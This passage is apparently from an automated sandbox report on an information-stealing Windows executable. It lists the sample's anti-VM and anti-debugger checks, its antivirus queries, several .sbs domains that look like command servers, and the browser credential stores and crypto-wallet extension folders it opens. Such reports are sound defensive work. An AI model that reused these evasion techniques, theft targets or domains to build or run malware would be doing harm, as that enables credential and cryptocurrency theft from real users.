              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337DA second address: 63337EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3B605222CCh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337EC second address: 63337F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63337F0 second address: 63337F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6337323 second address: 633732D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3B60BFE51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633732D second address: 633735A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jmp 00007F3B605222D3h 0x0000000f mov eax, dword ptr [eax] 0x00000011 jo 00007F3B605222E5h 0x00000017 push eax 0x00000018 push edx 0x00000019 jnl 00007F3B605222C6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633735A second address: 63373D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE523h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ecx 0x0000000e jnc 00007F3B60BFE518h 0x00000014 pop ecx 0x00000015 pop eax 0x00000016 mov ecx, dword ptr [ebp+122D39BFh] 0x0000001c push 00000003h 0x0000001e jmp 00007F3B60BFE51Eh 0x00000023 push 00000000h 0x00000025 push ecx 0x00000026 jmp 00007F3B60BFE529h 0x0000002b pop edi 0x0000002c mov di, 49C9h 0x00000030 push 00000003h 0x00000032 add dword ptr [ebp+122D1DA7h], eax 0x00000038 call 00007F3B60BFE519h 0x0000003d push ecx 0x0000003e push edx 0x0000003f jng 00007F3B60BFE516h 0x00000045 pop edx 0x00000046 pop ecx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63373D7 second address: 63373E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63373E6 second address: 63373EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63373EB second address: 6337421 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F3B605222C8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jmp 00007F3B605222CBh 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3B605222D6h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6337421 second address: 6337476 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3B60BFE526h 0x0000000b popad 0x0000000c pop eax 0x0000000d lea ebx, dword ptr [ebp+1244D1A7h] 0x00000013 pushad 0x00000014 js 00007F3B60BFE519h 0x0000001a call 00007F3B60BFE51Ah 0x0000001f mov edi, 037B6006h 0x00000024 pop edi 0x00000025 popad 0x00000026 jmp 00007F3B60BFE521h 0x0000002b push eax 0x0000002c push esi 0x0000002d push esi 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6337515 second address: 6337525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 ja 00007F3B605222C6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63375E6 second address: 6337647 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B60BFE51Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jg 00007F3B60BFE516h 0x00000014 popad 0x00000015 jmp 00007F3B60BFE51Dh 0x0000001a popad 0x0000001b nop 0x0000001c push ecx 0x0000001d mov edi, dword ptr [ebp+122D394Bh] 0x00000023 pop esi 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push edi 0x00000029 call 00007F3B60BFE518h 0x0000002e pop edi 0x0000002f mov dword ptr [esp+04h], edi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc edi 0x0000003c push edi 0x0000003d ret 0x0000003e pop edi 0x0000003f ret 0x00000040 push esi 0x00000041 pop edx 0x00000042 push F2967162h 0x00000047 pushad 0x00000048 push esi 0x00000049 push eax 0x0000004a push edx 0x0000004b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6337647 second address: 63376E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F3B605222D9h 0x0000000a popad 0x0000000b add dword ptr [esp], 0D698F1Eh 0x00000012 call 00007F3B605222D2h 0x00000017 sub dword ptr [ebp+122D2BDCh], ecx 0x0000001d pop edx 0x0000001e push 00000003h 0x00000020 call 00007F3B605222D2h 0x00000025 sub dword ptr [ebp+122D1D32h], esi 0x0000002b pop ecx 0x0000002c push 00000000h 0x0000002e jmp 00007F3B605222D2h 0x00000033 push 00000003h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F3B605222C8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f push 81E9D5CFh 0x00000054 push eax 0x00000055 push edx 0x00000056 push ebx 0x00000057 pushad 0x00000058 popad 0x00000059 pop ebx 0x0000005a rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1ECB63 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 39472C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3BCEB5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1ECA82 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 3999A6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 41B4C1 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61BDCD2 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6358816 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 63ECE17 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 61C3809 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C06F3 rdtsc 0_2_061C06F3
              Source: C:\Users\user\Desktop\file.exe TID: 1484Thread sleep time: -270000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2800Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: file.exe, file.exe, 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561249041.0000000000375000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000002.2565129419.000000000599F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2187103752.0000000001057000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472589117.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561917561.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561917561.0000000001007000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2209698310.0000000001056000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316039420.000000000104E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.0000000001052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2561917561.00000000010A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2187103752.0000000001057000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2472589117.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561917561.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2292290513.000000000104F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2209698310.0000000001056000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316039420.000000000104E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.0000000001052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWBn
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2237684214.00000000059DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2561249041.0000000000375000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2237684214.00000000059D7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_061C06F3 rdtsc 0_2_061C06F3

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exeString found in binary or memory: p3ar11fter.sbs
              Source: file.exeString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exeString found in binary or memory: peepburry828.sbs
              Source: file.exeString found in binary or memory: p10tgrace.sbs
              Source: file.exeString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, file.exe, 00000000.00000002.2561249041.0000000000375000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
              Source: file.exe, file.exe, 00000000.00000002.2566693068.000000000633B000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: *Program Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2321194871.00000000010B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: les%\Windows Defender\MsMpeng.exe
              Source: file.exe, 00000000.00000003.2316039420.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2321194871.00000000010C1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316255813.00000000010B5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2316039420.000000000104E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2335045999.0000000001052000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4784, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: file.exe, 00000000.00000003.2292267592.00000000010BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: file.exe, 00000000.00000003.2288788601.000000000598D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3^
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: file.exe, 00000000.00000003.2292652191.0000000001051000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exe, 00000000.00000002.2561917561.00000000010A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
